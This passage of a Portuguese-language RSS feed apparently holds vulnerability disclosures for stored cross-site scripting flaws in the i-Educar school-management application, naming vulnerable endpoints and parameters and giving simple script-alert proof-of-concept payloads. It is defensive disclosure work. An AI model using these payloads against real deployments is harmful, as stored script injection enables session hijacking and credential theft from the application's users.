&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8370/image.png&amp;#34;
	width=&amp;#34;877&amp;#34;
	height=&amp;#34;800&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8370/image_hu_5f218bc04c4efbce.png 480w, /p/cve-2025-8370/image_hu_61d9d458bc662e2e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;109&amp;#34;
		data-flex-basis=&amp;#34;263px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8370.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8370.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7866</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7866/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7866/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7866-cross-site-scripting-xss-armazenado-no-endpoint-educar_deficiencia_lstphp-parâmetro-cod_deficiencia&amp;#34;&amp;gt;CVE-2025-7866: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7866&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7866&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7866-cross-site-scripting-xss-armazenado-no-endpoint-educar_deficiencia_lstphp-parâmetro-cod_deficiencia&amp;#34;&amp;gt;CVE-2025-7866: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7866&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7866&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7866/image.png&amp;#34;
	width=&amp;#34;1905&amp;#34;
	height=&amp;#34;1110&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7866/image_hu_646e3b277d6607bd.png 480w, /p/cve-2025-7866/image_hu_d58317a6e86cd50.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;171&amp;#34;
		data-flex-basis=&amp;#34;411px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7866/image-1.png&amp;#34;
	width=&amp;#34;1859&amp;#34;
	height=&amp;#34;1070&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7866/image-1_hu_88404b61f892a24.png 480w, /p/cve-2025-7866/image-1_hu_8ce0f4ae80111656.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;173&amp;#34;
		data-flex-basis=&amp;#34;416px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/2N25n832O88&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/2N25n832O88&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7866.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7866.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7867</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7867/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7867/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7867-cross-site-scripting-xss-armazenado-no-endpoint-agendaphp-parâmetro-agenda_rap_titulo&amp;#34;&amp;gt;CVE-2025-7867: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7867&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7867&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7867-cross-site-scripting-xss-armazenado-no-endpoint-agendaphp-parâmetro-agenda_rap_titulo&amp;#34;&amp;gt;CVE-2025-7867: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7867&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7867&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar PaCXXX&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7867/image.png&amp;#34;
	width=&amp;#34;1901&amp;#34;
	height=&amp;#34;986&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7867/image_hu_9177192a4933535d.png 480w, /p/cve-2025-7867/image_hu_1214bd40f85ed40c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7867/image-1.png&amp;#34;
	width=&amp;#34;1896&amp;#34;
	height=&amp;#34;898&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7867/image-1_hu_bad03e95b8b5cbe1.png 480w, /p/cve-2025-7867/image-1_hu_639a842d81b9b092.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;211&amp;#34;
		data-flex-basis=&amp;#34;506px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/dOwcn_k2iTE&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/dOwcn_k2iTE&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
